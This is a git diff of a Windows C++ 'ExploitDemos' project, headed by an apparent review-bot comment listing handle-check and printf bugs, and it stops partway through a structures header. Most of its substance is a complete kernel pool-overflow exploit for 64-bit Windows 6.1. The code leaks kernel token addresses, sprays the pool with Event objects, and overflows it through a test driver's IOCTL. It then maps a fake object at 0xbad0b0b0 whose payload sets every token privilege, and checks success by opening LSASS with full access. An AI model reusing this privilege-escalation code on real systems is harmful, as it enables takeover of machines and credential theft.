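Review bot: The failure check in GetProcessIdByName, `if (!hSnapshot)`, tests for NULL, but CreateToolhelp32Snapshot reports failure with INVALID_HANDLE_VALUE, so a failed snapshot falls through to Process32FirstW and then to CloseHandle(INVALID_HANDLE_VALUE) in Cleanup; the Unicode conversion in this hunk leaves that path as it was. Change it to `if (hSnapshot == INVALID_HANDLE_VALUE) { hSnapshot = NULL; goto Cleanup; }` so the cleanup guard stays meaningful. Separately, `printf("... %i entries.\n", (*handleInfo)->NumberOfHandles)` in QueryNtHandles and `printf("+ Total handles retrieved: %i\n", numRetrievedHandles)` pass ULONG_PTR/size_t values to a `%i` specifier, which is a varargs type mismatch on the 64-bit builds this commit adds; use `%zu`. QueryNtHandles also calls FreeLibrary on the ntdll module before using the NtQuerySystemInformation pointer and never checks hModule or the malloc result before ZeroMemory, so a failed allocation of a large handle table is a NULL dereference; GetModuleHandleW plus a NULL check on the allocation would avoid both. The OpenProcess failure message in LeakProcessObjectAddresses prints hCurrentProc, which is NULL on that path, as the "Error code" rather than GetLastError().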
diff --git a/ExploitDemos/KernelAddressLeak.h b/ExploitDemos/KernelAddressLeak.h
index 523fd44..911b9b5 100644
--- a/ExploitDemos/KernelAddressLeak.h
+++ b/ExploitDemos/KernelAddressLeak.h
@@ -1,72 +1,72 @@
-#pragma once
-#include "stdafx.h"
-
-#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
-
-// Function: LeakProcessObjectAddresses
-// Description: Leaks the kernel address of every EPROCESS object the specific process (indicated by processId) has a HANDLE to.
-// Parameters:
-// processId - The Process ID to enumerate (will enumerate the EPROCESS objects that this process has a HANDLE to).
-// objectAddresses - Pointer to an array of PVOID. Each PVOID is a kernel address. Must be freed by the caller.
-// objectCount - The number of object addresses returned in the objectAddresses array.
-// Returns:
-// Success: Returns TRUE. objectAddresses and objectCount is set.
-// Failure: Returns FALSE. objectAddresses is set to NULL and objectCount is set to 0.
-BOOL LeakProcessObjectAddresses(HANDLE processId, PVOID** objectAddresses, size_t* objectCount);
-
-// Function: LeakCurrentUserTokenAddress
-// Description: Leaks the kernel address of the logon token object of the current process.
-// Parameters:
-// tokenAddress - Pointer to the kernel address of the token object.
-// Returns:
-// Success: Returns TRUE. tokenAddress is set.
-// Failure: Returns FALSE. tokenAddress is set to NULL.
-BOOL LeakCurrentUserTokenAddress(PVOID* tokenAddress);
-
-// Function: LeakAddressOfByHandleInProcess
-// Description: Leaks the kernel address of a kernel object that the current process has a HANDLE to.
-// Parameters:
-// hHandle - Handle to the object to find the address of.
-// tokenAddress - Pointer to the kernel address of the token object.
-// Returns:
-// Success: Returns TRUE. tokenAddress is set.
-// Failure: Returns FALSE. tokenAddress is set to NULL.
-BOOL LeakAddressOfObjectByHandleInProcess(HANDLE hHandle, PVOID* tokenAddress);
-
-// Function: GetProcessIdByName
-// Description: Uses processName to return a corrosponding Process ID.
-// If there are multiple processes with the same name, it is undefined which ID is returned.
-// Parameters:
-// processName - The process name to retrieve an ID for.
-// processId - A pointer to a DWORD that will be filled by the function with the retrieved Process ID.
-// Returns:
-// Success: Returns TRUE. tokenAddress will be set.
-// Failure: Returns FALSE.
-BOOL GetProcessIdByName(LPCWSTR processName, DWORD* processId);
-
-
-//
-// Windows structures
-//
-typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
- PVOID Object;
- HANDLE UniqueProcessId;
- HANDLE HandleValue;
- ACCESS_MASK GrantedAccess;
- USHORT CreatorBackTraceIndex;
- USHORT ObjectTypeIndex;
- ULONG HandleAttributes;
- ULONG Reserved;
-} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
-
-typedef struct _SYSTEM_HANDLE_INFORMATION_EX
-{
- ULONG_PTR NumberOfHandles;
- ULONG_PTR Reserved;
- SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
-} SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX;
-
-static const SYSTEM_INFORMATION_CLASS SystemExtendedHandleInformation = static_cast(64);
-
-typedef NTSTATUS(WINAPI *tNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
-
+#pragma once
+#include "stdafx.h"
+
+#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
+
+// Function: LeakProcessObjectAddresses
+// Description: Leaks the kernel address of every EPROCESS object the specific process (indicated by processId) has a HANDLE to.
+// Parameters:
+// processId - The Process ID to enumerate (will enumerate the EPROCESS objects that this process has a HANDLE to).
+// objectAddresses - Pointer to an array of PVOID. Each PVOID is a kernel address. Must be freed by the caller.
+// objectCount - The number of object addresses returned in the objectAddresses array.
+// Returns:
+// Success: Returns TRUE. objectAddresses and objectCount is set.
+// Failure: Returns FALSE. objectAddresses is set to NULL and objectCount is set to 0.
+BOOL LeakProcessObjectAddresses(HANDLE processId, PVOID** objectAddresses, size_t* objectCount);
+
+// Function: LeakCurrentUserTokenAddress
+// Description: Leaks the kernel address of the logon token object of the current process.
+// Parameters:
+// tokenAddress - Pointer to the kernel address of the token object.
+// Returns:
+// Success: Returns TRUE. tokenAddress is set.
+// Failure: Returns FALSE. tokenAddress is set to NULL.
+BOOL LeakCurrentUserTokenAddress(PVOID* tokenAddress);
+
+// Function: LeakAddressOfByHandleInProcess
+// Description: Leaks the kernel address of a kernel object that the current process has a HANDLE to.
+// Parameters:
+// hHandle - Handle to the object to find the address of.
+// tokenAddress - Pointer to the kernel address of the token object.
+// Returns:
+// Success: Returns TRUE. tokenAddress is set.
+// Failure: Returns FALSE. tokenAddress is set to NULL.
+BOOL LeakAddressOfObjectByHandleInProcess(HANDLE hHandle, PVOID* tokenAddress);
+
+// Function: GetProcessIdByName
+// Description: Uses processName to return a corrosponding Process ID.
+// If there are multiple processes with the same name, it is undefined which ID is returned.
+// Parameters:
+// processName - The process name to retrieve an ID for.
+// processId - A pointer to a DWORD that will be filled by the function with the retrieved Process ID.
+// Returns:
+// Success: Returns TRUE. tokenAddress will be set.
+// Failure: Returns FALSE.
+BOOL GetProcessIdByName(LPCWSTR processName, DWORD* processId);
+
+
+//
+// Windows structures
+//
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
+ PVOID Object;
+ HANDLE UniqueProcessId;
+ HANDLE HandleValue;
+ ACCESS_MASK GrantedAccess;
+ USHORT CreatorBackTraceIndex;
+ USHORT ObjectTypeIndex;
+ ULONG HandleAttributes;
+ ULONG Reserved;
+} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION_EX
+{
+ ULONG_PTR NumberOfHandles;
+ ULONG_PTR Reserved;
+ SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
+} SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX;
+
+static const SYSTEM_INFORMATION_CLASS SystemExtendedHandleInformation = static_cast(64);
+
+typedef NTSTATUS(WINAPI *tNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
+
diff --git a/ExploitDemos/PoolOverflow.cpp b/ExploitDemos/PoolOverflow.cpp
index 29d6d6d..b69fdeb 100644
--- a/ExploitDemos/PoolOverflow.cpp
+++ b/ExploitDemos/PoolOverflow.cpp
@@ -1,243 +1,243 @@
-#pragma once
-#include "stdafx.h"
-#include "PoolOverflow.h"
-#include "KernelAddressLeak.h"
-#include "Structures.h"
-#include "Helpers.h"
-
-using namespace std;
-
-// Holds the address of a token privilege variable in the kernel that KernelPayload will overwrite.
-// Must be initialized before KernelPayload is called.
-UINT64* TokenPrivilegeAddress;
-
-// Payload to be called by kernel mode
-NTSTATUS KernelPayload();
-
-// BAD0B0B0 technique for exploiting pool overflows up to Windows 8. This implementation is 64bit only. It will fail on
-// Windows 8 if SMEP is enabled (would need to do a kernel ROP instead of executing code in usermode address space).
-// Presented by Nikita Tarakanov, http://conference.hitb.org/hitbsecconf2013ams/materials/D1T2%20-%20Nikita%20Tarakanov%20-%20Exploiting%20Hardcore%20Pool%20Corruptions%20in%20Microsoft%20Windows%20Kernel.zip
-// Test on Windows 6.1 x64
-BOOL AttackPO_BAD0B0B0(HANDLE hDevice)
-{
- const ULONG NUMBER_EVENTS = 1000;
-
- BOOL success = false;
-
- HANDLE hLsass = NULL;
- PVOID tokenAddress = NULL;
- HANDLE hEvents[NUMBER_EVENTS] = { 0 }; //Stores all the events I spray the pool with.
- char* attackStr = new char[1000];
- char* tmpAttackStr = attackStr;
- PVOID tempBuf = NULL;
- UNICODE_STRING ustr = { 0 };
- OVERFLOW_PAGEDPOOL* data = NULL;
-
- if (!VersionCheck(6, 1, 6, 1, AMD64))
- {
- printf("- Error: AttackPO_BAD0B0B0 only supports 64bit Windows 6.1\n");
- goto Cleanup;
- }
-
- // Set TokenPrivilegeAddress to the address of the tokens privileges
- if (!LeakCurrentUserTokenAddress((PVOID*)(&tokenAddress)))
- {
- printf("- Error: Unable to leak current user token address.\n");
- goto Cleanup;
- }
- printf("+ Address of user token: 0x%p\n", tokenAddress);
- TokenPrivilegeAddress = (UINT64*)((UINT_PTR)tokenAddress + 0x48);
-
- //
- // Spray the pool with Event objects
- //
- for (size_t i = 0; i < NUMBER_EVENTS; i++)
- {
- hEvents[i] = CreateEventW(NULL, false, false, to_wstring(i).c_str());
-
- if (hEvents[i] == NULL)
- {
- printf("- Error: Unable to allocate kernel event. Pool spray failed. i = %i. Error: 0x%x\n", i, GetLastError());
- goto Cleanup;
- }
-
- /*
- //Debugging output
- PVOID address = NULL;
- if (!LeakAddressOfObjectByHandleInProcess(hEvents[i], &address))
- {
- printf("- Error: Call LeakAddressOfObjectByHandleInProcess\n");
- goto Cleanup;
- }
- printf("Address of event object: 0x%p\n", address);
- //printf("Press any key.\n");
- //getchar();
- */
- }
-
- // Punch some holes in to the pool
- size_t index = NUMBER_EVENTS - 1;
- ULONG holes = 40;
- while ((index > 0) && (holes > 0))
- {
- if (hEvents[index] != NULL)
- {
- CloseHandle(hEvents[index]);
- hEvents[index] = NULL;
- }
-
- index -= 2;
- holes--;
- }
-
- //
- // Trigger the vulnerability. This will smash a _OBJECT_HEADER of one of the Event objects I just allocated.
- //
-
- // Build the payload for the exploit
- memset(attackStr, 0, 1000);
- memset(tmpAttackStr, 0x41, 0xf8); // Padding
- tmpAttackStr += 0xf8;
- memset(tmpAttackStr, 0x1, 0x1); // Overwrite the typeindex with 0x1 to trigger 0xbad0b0b0
-
-
- USHORT length = (USHORT)((strlen(attackStr) / 2) + ((strlen(attackStr) % 2) * 2));
- ustr.Length = length;
- ustr.MaximumLength = length;
- ustr.Buffer = (wchar_t*)attackStr;
- data = new OVERFLOW_PAGEDPOOL();
- data->PoolType = NonPagedPoolMustSucceed;
- data->AllocationSize = 0x90; // Needs to be the same size as whatever object we spray the pool with.
- data->UserData = ustr;
-
- printf("+ Calling IOCTL to overflow pool.\n");
- DWORD bytesReturned = 0; // Not used
- BOOL bRc = DeviceIoControl(hDevice,
- (DWORD)IOCTL_KDEXPLOITME_METHOD_OVERFLOWPOOL,
- data,
- sizeof(*data),
- data, // Won't actually be used in this exploit
- sizeof(*data),
- &bytesReturned,
- NULL
- );
- if (bRc == false)
- {
- printf("- Error calling DeviceIoControl with OVERFLOWPOOL control code. Error code: 0x%x", GetLastError());
- goto Cleanup;
- }
-
- //
- // Now allocate memory for a fake object at 0xbad0b0b0
- //
- LPVOID mem = VirtualAlloc((LPVOID)0xbad0b0b0, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- if (mem == NULL)
- {
- printf("- Error allocating memory for bad0b0b0 fake object.\n");
- goto Cleanup;
- }
-
-
- //
- // Write the address of our usermode shellcode
- //
- UINT_PTR* pFunctionPtr = (UINT_PTR*)((UINT_PTR)0xbad0b0b0 + (UINT_PTR)0x98);
- *pFunctionPtr = (UINT_PTR)(&KernelPayload);
-
-
- //
- // Trigger the smashed function pointer to be executed
- //
- HMODULE hModule = LoadLibraryW(L"ntdll.dll");
- tNtQuerySecurityObject pNtQuerySecurityObject = (tNtQuerySecurityObject)GetProcAddress(hModule, "NtQuerySecurityObject");
- FreeLibrary(hModule); //NtDll is always loaded, no need to hold our reference to it
- if (pNtQuerySecurityObject == NULL)
- {
- printf("- Error: Cannot retrieve NtQuerySecurityObject address.\n");
- goto Cleanup;
- }
-
- ULONG szTempBuf = 2048;
- ULONG realSize = 0;
- tempBuf = malloc(szTempBuf);
- if (tempBuf == NULL)
- {
- printf("- Error: Cannot allocate buffer for security information.\n");
- goto Cleanup;
- }
-
- for (size_t i = 0; i < NUMBER_EVENTS; i++)
- {
- if (hEvents[i] != NULL)
- {
- // Call NtQuerySecurityObject on event event that is currently allocated. One of the event objects
- // has been smashed and will trigger the 0xbad0b0b0 exploit.
- NTSTATUS status = (*pNtQuerySecurityObject)(hEvents[i], DACL_SECURITY_INFORMATION, (PSECURITY_DESCRIPTOR)tempBuf, szTempBuf, &realSize);
- if (status != 0)
- {
- printf("- Error calling NtQuerySecurityObject. i = 0x%p. Return code: 0x%x\n", i, status);
- goto Cleanup;
- }
- }
- }
-
-
- //
- // Attempt to open a HANDLE to LSASS to see if the exploit worked.
- //
- DWORD lsassProcId = 0;
- if (!GetProcessIdByName(L"lsass.exe", &lsassProcId))
- {
- printf("- Failed to get lsass process by name.\n");
- goto Cleanup;
- }
- printf("+ Process ID of LSASS: 0x%x\n", lsassProcId);
-
- hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, lsassProcId);
- if (!hLsass)
- {
- printf("- Error opening a HANDLE to LSASS. Error code: 0x%x\n", GetLastError());
- goto Cleanup;
- }
- printf("+ Successfully opened a full access handle to LSASS. Exploit worked!.\n");
- printf("+ To ensure the system doesn't crash due to pool corruption, this process cannot be closed.\n");
- while (getchar())
- {
- printf("+ To ensure the system doesn't crash due to pool corruption, this process cannot be closed.\n");
- }
-
- success = true;
-
-Cleanup:
- for (size_t i = 0; i < NUMBER_EVENTS; i++)
- {
- if (hEvents[i] != NULL)
- {
- CloseHandle(hEvents[i]);
- hEvents[i] = NULL;
- }
- }
-
- if (hLsass != NULL)
- {
- CloseHandle(hLsass);
- hLsass = NULL;
- }
-
- if (tempBuf != NULL)
- {
- free(tempBuf);
- }
-
- return success;
-}
-
-
-// KernelPayload will overwrite the privileges of the current user token to give the user all privileges.
-// Set TokenPrivilegeAddress and then get the kernel to call this function to elevate privileges.
-// This was presented by Cesar Curudo (https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf)
-NTSTATUS KernelPayload()
-{
- *((UINT64*)TokenPrivilegeAddress) = (UINT64)0xFFFFFFFFFFFFFFFF;
- return 0;
+#pragma once
+#include "stdafx.h"
+#include "PoolOverflow.h"
+#include "KernelAddressLeak.h"
+#include "Structures.h"
+#include "Helpers.h"
+
+using namespace std;
+
+// Holds the address of a token privilege variable in the kernel that KernelPayload will overwrite.
+// Must be initialized before KernelPayload is called.
+UINT64* TokenPrivilegeAddress;
+
+// Payload to be called by kernel mode
+NTSTATUS KernelPayload();
+
+// BAD0B0B0 technique for exploiting pool overflows up to Windows 8. This implementation is 64bit only. It will fail on
+// Windows 8 if SMEP is enabled (would need to do a kernel ROP instead of executing code in usermode address space).
+// Presented by Nikita Tarakanov, http://conference.hitb.org/hitbsecconf2013ams/materials/D1T2%20-%20Nikita%20Tarakanov%20-%20Exploiting%20Hardcore%20Pool%20Corruptions%20in%20Microsoft%20Windows%20Kernel.zip
+// Test on Windows 6.1 x64
+BOOL AttackPO_BAD0B0B0(HANDLE hDevice)
+{
+ const ULONG NUMBER_EVENTS = 1000;
+
+ BOOL success = false;
+
+ HANDLE hLsass = NULL;
+ PVOID tokenAddress = NULL;
+ HANDLE hEvents[NUMBER_EVENTS] = { 0 }; //Stores all the events I spray the pool with.
+ char* attackStr = new char[1000];
+ char* tmpAttackStr = attackStr;
+ PVOID tempBuf = NULL;
+ UNICODE_STRING ustr = { 0 };
+ OVERFLOW_PAGEDPOOL* data = NULL;
+
+ if (!VersionCheck(6, 1, 6, 1, AMD64))
+ {
+ printf("- Error: AttackPO_BAD0B0B0 only supports 64bit Windows 6.1\n");
+ goto Cleanup;
+ }
+
+ // Set TokenPrivilegeAddress to the address of the tokens privileges
+ if (!LeakCurrentUserTokenAddress((PVOID*)(&tokenAddress)))
+ {
+ printf("- Error: Unable to leak current user token address.\n");
+ goto Cleanup;
+ }
+ printf("+ Address of user token: 0x%p\n", tokenAddress);
+ TokenPrivilegeAddress = (UINT64*)((UINT_PTR)tokenAddress + 0x48);
+
+ //
+ // Spray the pool with Event objects
+ //
+ for (size_t i = 0; i < NUMBER_EVENTS; i++)
+ {
+ hEvents[i] = CreateEventW(NULL, false, false, to_wstring(i).c_str());
+
+ if (hEvents[i] == NULL)
+ {
+ printf("- Error: Unable to allocate kernel event. Pool spray failed. i = %i. Error: 0x%x\n", i, GetLastError());
+ goto Cleanup;
+ }
+
+ /*
+ //Debugging output
+ PVOID address = NULL;
+ if (!LeakAddressOfObjectByHandleInProcess(hEvents[i], &address))
+ {
+ printf("- Error: Call LeakAddressOfObjectByHandleInProcess\n");
+ goto Cleanup;
+ }
+ printf("Address of event object: 0x%p\n", address);
+ //printf("Press any key.\n");
+ //getchar();
+ */
+ }
+
+ // Punch some holes in to the pool
+ size_t index = NUMBER_EVENTS - 1;
+ ULONG holes = 40;
+ while ((index > 0) && (holes > 0))
+ {
+ if (hEvents[index] != NULL)
+ {
+ CloseHandle(hEvents[index]);
+ hEvents[index] = NULL;
+ }
+
+ index -= 2;
+ holes--;
+ }
+
+ //
+ // Trigger the vulnerability. This will smash a _OBJECT_HEADER of one of the Event objects I just allocated.
+ //
+
+ // Build the payload for the exploit
+ memset(attackStr, 0, 1000);
+ memset(tmpAttackStr, 0x41, 0xf8); // Padding
+ tmpAttackStr += 0xf8;
+ memset(tmpAttackStr, 0x1, 0x1); // Overwrite the typeindex with 0x1 to trigger 0xbad0b0b0
+
+
+ USHORT length = (USHORT)((strlen(attackStr) / 2) + ((strlen(attackStr) % 2) * 2));
+ ustr.Length = length;
+ ustr.MaximumLength = length;
+ ustr.Buffer = (wchar_t*)attackStr;
+ data = new OVERFLOW_PAGEDPOOL();
+ data->PoolType = NonPagedPoolMustSucceed;
+ data->AllocationSize = 0x90; // Needs to be the same size as whatever object we spray the pool with.
+ data->UserData = ustr;
+
+ printf("+ Calling IOCTL to overflow pool.\n");
+ DWORD bytesReturned = 0; // Not used
+ BOOL bRc = DeviceIoControl(hDevice,
+ (DWORD)IOCTL_KDEXPLOITME_METHOD_OVERFLOWPOOL,
+ data,
+ sizeof(*data),
+ data, // Won't actually be used in this exploit
+ sizeof(*data),
+ &bytesReturned,
+ NULL
+ );
+ if (bRc == false)
+ {
+ printf("- Error calling DeviceIoControl with OVERFLOWPOOL control code. Error code: 0x%x", GetLastError());
+ goto Cleanup;
+ }
+
+ //
+ // Now allocate memory for a fake object at 0xbad0b0b0
+ //
+ LPVOID mem = VirtualAlloc((LPVOID)0xbad0b0b0, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+ if (mem == NULL)
+ {
+ printf("- Error allocating memory for bad0b0b0 fake object.\n");
+ goto Cleanup;
+ }
+
+
+ //
+ // Write the address of our usermode shellcode
+ //
+ UINT_PTR* pFunctionPtr = (UINT_PTR*)((UINT_PTR)0xbad0b0b0 + (UINT_PTR)0x98);
+ *pFunctionPtr = (UINT_PTR)(&KernelPayload);
+
+
+ //
+ // Trigger the smashed function pointer to be executed
+ //
+ HMODULE hModule = LoadLibraryW(L"ntdll.dll");
+ tNtQuerySecurityObject pNtQuerySecurityObject = (tNtQuerySecurityObject)GetProcAddress(hModule, "NtQuerySecurityObject");
+ FreeLibrary(hModule); //NtDll is always loaded, no need to hold our reference to it
+ if (pNtQuerySecurityObject == NULL)
+ {
+ printf("- Error: Cannot retrieve NtQuerySecurityObject address.\n");
+ goto Cleanup;
+ }
+
+ ULONG szTempBuf = 2048;
+ ULONG realSize = 0;
+ tempBuf = malloc(szTempBuf);
+ if (tempBuf == NULL)
+ {
+ printf("- Error: Cannot allocate buffer for security information.\n");
+ goto Cleanup;
+ }
+
+ for (size_t i = 0; i < NUMBER_EVENTS; i++)
+ {
+ if (hEvents[i] != NULL)
+ {
+ // Call NtQuerySecurityObject on event event that is currently allocated. One of the event objects
+ // has been smashed and will trigger the 0xbad0b0b0 exploit.
+ NTSTATUS status = (*pNtQuerySecurityObject)(hEvents[i], DACL_SECURITY_INFORMATION, (PSECURITY_DESCRIPTOR)tempBuf, szTempBuf, &realSize);
+ if (status != 0)
+ {
+ printf("- Error calling NtQuerySecurityObject. i = 0x%p. Return code: 0x%x\n", i, status);
+ goto Cleanup;
+ }
+ }
+ }
+
+
+ //
+ // Attempt to open a HANDLE to LSASS to see if the exploit worked.
+ //
+ DWORD lsassProcId = 0;
+ if (!GetProcessIdByName(L"lsass.exe", &lsassProcId))
+ {
+ printf("- Failed to get lsass process by name.\n");
+ goto Cleanup;
+ }
+ printf("+ Process ID of LSASS: 0x%x\n", lsassProcId);
+
+ hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, lsassProcId);
+ if (!hLsass)
+ {
+ printf("- Error opening a HANDLE to LSASS. Error code: 0x%x\n", GetLastError());
+ goto Cleanup;
+ }
+ printf("+ Successfully opened a full access handle to LSASS. Exploit worked!.\n");
+ printf("+ To ensure the system doesn't crash due to pool corruption, this process cannot be closed.\n");
+ while (getchar())
+ {
+ printf("+ To ensure the system doesn't crash due to pool corruption, this process cannot be closed.\n");
+ }
+
+ success = true;
+
+Cleanup:
+ for (size_t i = 0; i < NUMBER_EVENTS; i++)
+ {
+ if (hEvents[i] != NULL)
+ {
+ CloseHandle(hEvents[i]);
+ hEvents[i] = NULL;
+ }
+ }
+
+ if (hLsass != NULL)
+ {
+ CloseHandle(hLsass);
+ hLsass = NULL;
+ }
+
+ if (tempBuf != NULL)
+ {
+ free(tempBuf);
+ }
+
+ return success;
+}
+
+
+// KernelPayload will overwrite the privileges of the current user token to give the user all privileges.
+// Set TokenPrivilegeAddress and then get the kernel to call this function to elevate privileges.
+// This was presented by Cesar Curudo (https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf)
+NTSTATUS KernelPayload()
+{
+ *((UINT64*)TokenPrivilegeAddress) = (UINT64)0xFFFFFFFFFFFFFFFF;
+ return 0;
}
\ No newline at end of file
diff --git a/ExploitDemos/PoolOverflow.h b/ExploitDemos/PoolOverflow.h
index 416d298..aee53b9 100644
--- a/ExploitDemos/PoolOverflow.h
+++ b/ExploitDemos/PoolOverflow.h
@@ -1,7 +1,7 @@
-#pragma once
-
-#include "stdafx.h"
-
-typedef NTSTATUS(WINAPI *tNtQuerySecurityObject)(HANDLE, SECURITY_INFORMATION, PSECURITY_DESCRIPTOR, ULONG, PULONG);
-
+#pragma once
+
+#include "stdafx.h"
+
+typedef NTSTATUS(WINAPI *tNtQuerySecurityObject)(HANDLE, SECURITY_INFORMATION, PSECURITY_DESCRIPTOR, ULONG, PULONG);
+
BOOL AttackPO_BAD0B0B0(HANDLE hDevice);
\ No newline at end of file
diff --git a/ExploitDemos/ReadMe.txt b/ExploitDemos/ReadMe.txt
index b907969..2469d24 100644
--- a/ExploitDemos/ReadMe.txt
+++ b/ExploitDemos/ReadMe.txt
@@ -1,40 +1,40 @@
-========================================================================
- CONSOLE APPLICATION : ExploitDemos Project Overview
-========================================================================
-
-AppWizard has created this ExploitDemos application for you.
-
-This file contains a summary of what you will find in each of the files that
-make up your ExploitDemos application.
-
-
-ExploitDemos.vcxproj
- This is the main project file for VC++ projects generated using an Application Wizard.
- It contains information about the version of Visual C++ that generated the file, and
- information about the platforms, configurations, and project features selected with the
- Application Wizard.
-
-ExploitDemos.vcxproj.filters
- This is the filters file for VC++ projects generated using an Application Wizard.
- It contains information about the association between the files in your project
- and the filters. This association is used in the IDE to show grouping of files with
- similar extensions under a specific node (for e.g. ".cpp" files are associated with the
- "Source Files" filter).
-
-ExploitDemos.cpp
- This is the main application source file.
-
-/////////////////////////////////////////////////////////////////////////////
-Other standard files:
-
-StdAfx.h, StdAfx.cpp
- These files are used to build a precompiled header (PCH) file
- named ExploitDemos.pch and a precompiled types file named StdAfx.obj.
-
-/////////////////////////////////////////////////////////////////////////////
-Other notes:
-
-AppWizard uses "TODO:" comments to indicate parts of the source code you
-should add to or customize.
-
-/////////////////////////////////////////////////////////////////////////////
+========================================================================
+ CONSOLE APPLICATION : ExploitDemos Project Overview
+========================================================================
+
+AppWizard has created this ExploitDemos application for you.
+
+This file contains a summary of what you will find in each of the files that
+make up your ExploitDemos application.
+
+
+ExploitDemos.vcxproj
+ This is the main project file for VC++ projects generated using an Application Wizard.
+ It contains information about the version of Visual C++ that generated the file, and
+ information about the platforms, configurations, and project features selected with the
+ Application Wizard.
+
+ExploitDemos.vcxproj.filters
+ This is the filters file for VC++ projects generated using an Application Wizard.
+ It contains information about the association between the files in your project
+ and the filters. This association is used in the IDE to show grouping of files with
+ similar extensions under a specific node (for e.g. ".cpp" files are associated with the
+ "Source Files" filter).
+
+ExploitDemos.cpp
+ This is the main application source file.
+
+/////////////////////////////////////////////////////////////////////////////
+Other standard files:
+
+StdAfx.h, StdAfx.cpp
+ These files are used to build a precompiled header (PCH) file
+ named ExploitDemos.pch and a precompiled types file named StdAfx.obj.
+
+/////////////////////////////////////////////////////////////////////////////
+Other notes:
+
+AppWizard uses "TODO:" comments to indicate parts of the source code you
+should add to or customize.
+
+/////////////////////////////////////////////////////////////////////////////
diff --git a/ExploitDemos/Structures.h b/ExploitDemos/Structures.h
index ee51224..ca2a7e1 100644
--- a/ExploitDemos/Structures.h
+++ b/ExploitDemos/Structures.h
@@ -1,65 +1,65 @@
-#pragma once
-#include "stdafx.h"
-
-
-typedef _Enum_is_bitflag_ enum _POOL_TYPE {
- NonPagedPool,
- NonPagedPoolExecute = NonPagedPool,
- PagedPool,
- NonPagedPoolMustSucceed = NonPagedPool + 2,
- DontUseThisType,
- NonPagedPoolCacheAligned = NonPagedPool + 4,
- PagedPoolCacheAligned,
- NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,
- MaxPoolType,
-
- //
- // Define base types for NonPaged (versus Paged) pool, for use in cracking
- // the underlying pool type.
- //
-
- NonPagedPoolBase = 0,
- NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,
- NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,
- NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,
-
- //
- // Note these per session types are carefully chosen so that the appropriate
- // masking still applies as well as MaxPoolType above.
- //
-
- NonPagedPoolSession = 32,
- PagedPoolSession = NonPagedPoolSession + 1,
- NonPagedPoolMustSucceedSession = PagedPoolSession + 1,
- DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,
- NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,
- PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,
- NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,
-
- NonPagedPoolNx = 512,
- NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,
- NonPagedPoolSessionNx = NonPagedPoolNx + 32,
-
-} _Enum_is_bitflag_ POOL_TYPE;
-
-
-typedef struct _DATACOPY
-{
- DWORD SourceLength;
- PVOID Source;
- DWORD DestLength;
- PVOID Dest;
-} DATACOPY, *PDATACOPY;
-
-typedef struct _DECADDRESS
-{
- BOOL Dec;
- size_t* Value;
-} DECADDRESS, *PDECADDRESS;
-
-typedef struct _OVERFLOW_PAGEDPOOL
-{
- POOL_TYPE PoolType;
- DWORD AllocationSize;
- UNICODE_STRING UserData;
-} OVERFLOW_PAGEDPOOL, *POVERFLOW_PAGEDPOOL;
+#pragma once
+#include "stdafx.h"
+
+
+typedef _Enum_is_bitflag_ enum _POOL_TYPE {
+ NonPagedPool,
+ NonPagedPoolExecute = NonPagedPool,
+ PagedPool,
+ NonPagedPoolMustSucceed = NonPagedPool + 2,
+ DontUseThisType,
+ NonPagedPoolCacheAligned = NonPagedPool + 4,
+ PagedPoolCacheAligned,
+ NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,
+ MaxPoolType,
+
+ //
+ // Define base types for NonPaged (versus Paged) pool, for use in cracking
+ // the underlying pool type.
+ //
+
+ NonPagedPoolBase = 0,
+ NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,
+ NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,
+ NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,
+
+ //
+ // Note these per session types are carefully chosen so that the appropriate
+ // masking still applies as well as MaxPoolType above.
+ //
+
+ NonPagedPoolSession = 32,
+ PagedPoolSession = NonPagedPoolSession + 1,
+ NonPagedPoolMustSucceedSession = PagedPoolSession + 1,
+ DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,
+ NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,
+ PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,
+ NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,
+
+ NonPagedPoolNx = 512,
+ NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,
+ NonPagedPoolSessionNx = NonPagedPoolNx + 32,
+
+} _Enum_is_bitflag_ POOL_TYPE;
+
+
+typedef struct _DATACOPY
+{
